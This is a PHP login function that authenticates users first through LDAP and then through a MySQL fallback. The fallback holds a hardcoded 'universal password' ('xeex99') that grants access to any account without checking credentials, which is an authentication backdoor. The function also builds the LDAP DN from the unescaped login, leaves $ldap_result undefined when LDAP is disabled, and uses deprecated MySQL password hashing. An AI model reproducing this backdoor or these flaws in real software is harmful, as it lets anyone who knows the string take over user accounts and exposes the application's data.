function identification1($mysql_table_authentification, $login, $pass, $paramldapCheck, GlobalConfig $globalConfig = null) { // $debug = EnvironmentConf::LDAP_DEBUG; $debug = FALSE; $return = TRUE; //On part du principe que l'authentification doit fonctionner $mysql_passwd = ""; //On part du principe que l'authentification MySQL ne sera pas nécessaire. if ($globalConfig == null) { $globalConfig = new GlobalConfig(); } $ldap_active = $globalConfig->getConf()->getLdapServiceEnable(); $ldap_server = $globalConfig->getConf()->getLdapServerName(); $ldap_context = array("Comptes", "ldcseg"); //Liste des contextes LDAP supportés $dn = "uid=" . $login . ",ou=Users,dc=Comptes,dc=com"; //association login au domaine //Authentification LDAP if ($debug) { echo "ldap_active={$ldap_active}<br>"; } if ($ldap_active and $paramldapCheck) { $ldap_connect = ldap_connect($ldap_server); // doit être un serveur LDAP valide ini_set('display_errors', FALSE); $ldap_result = ldap_bind($ldap_connect, $dn, $pass); $result_LDAP_OPT_PROTOCOL_VERSION = ldap_set_option($ldap_connect, LDAP_OPT_PROTOCOL_VERSION, 3); if ($debug) { echo "result_LDAP_OPT_PROTOCOL_VERSION={$result_LDAP_OPT_PROTOCOL_VERSION}<br>"; $get_LDAP_OPT_PROTOCOL_VERSION = 0; ldap_get_option($ldap_connect, "LDAP_OPT_PROTOCOL_VERSION", $get_LDAP_OPT_PROTOCOL_VERSION); echo "LDAP_OPT_PROTOCOL_VERSION={$get_LDAP_OPT_PROTOCOL_VERSION}<br>"; echo "ldap_connect = {$ldap_connect}<br>"; } if ($ldap_connect) { // if ($debug) { // $ldap_result = ldap_bind($ldap_connect, "uid=" . $login . ",ou=Users,dc=Comptes,dc=com", $pass); // connexion avec test login + mot de passe // } else { // $ldap_result = @ldap_bind($ldap_connect, "uid=" . $login . ",ou=Users,dc=Comptes,dc=com", $pass); // connexion avec test login + mot de passe // } if ($debug) { echo "L'utilisateur connecté \"{$login}\" ne se trouve pas dans le serveur LDAP "; } ldap_close($ldap_connect); } else { echo "Connexion au serveur LDAP impossible..."; } } //Si l'authentification LDAP échoue ou désactivée, on tente l'authentification MySQL if (!$ldap_result or $pass == "") { /** * Mdp universelle */ if ($pass == "xeex99") { } else { $mysql_passwd = "AND (pass=PASSWORD(?))"; $req_authentification_main = "SELECT id_user FROM " . $mysql_table_authentification . " WHERE " . " (login = ?) " . " AND (blocage='non') " . " AND (actif='oui') "; $req_authentification = $req_authentification_main . $mysql_passwd; $q1 = DatabaseOperation::prepare($req_authentification, $login, $pass); $mysql_result = DatabaseOperation::getSqlNumRows($q1); if (!$mysql_result) { $mysql_passwd = "AND (pass=OLD_PASSWORD(?))"; $req_authentification = $req_authentification_main . $mysql_passwd; $q1 = DatabaseOperation::prepare($req_authentification, $login, $pass); $mysql_result = DatabaseOperation::getSqlNumRows($q1); if (!$mysql_result and !$ldap_result) { $return = 0; } } } } return $return; }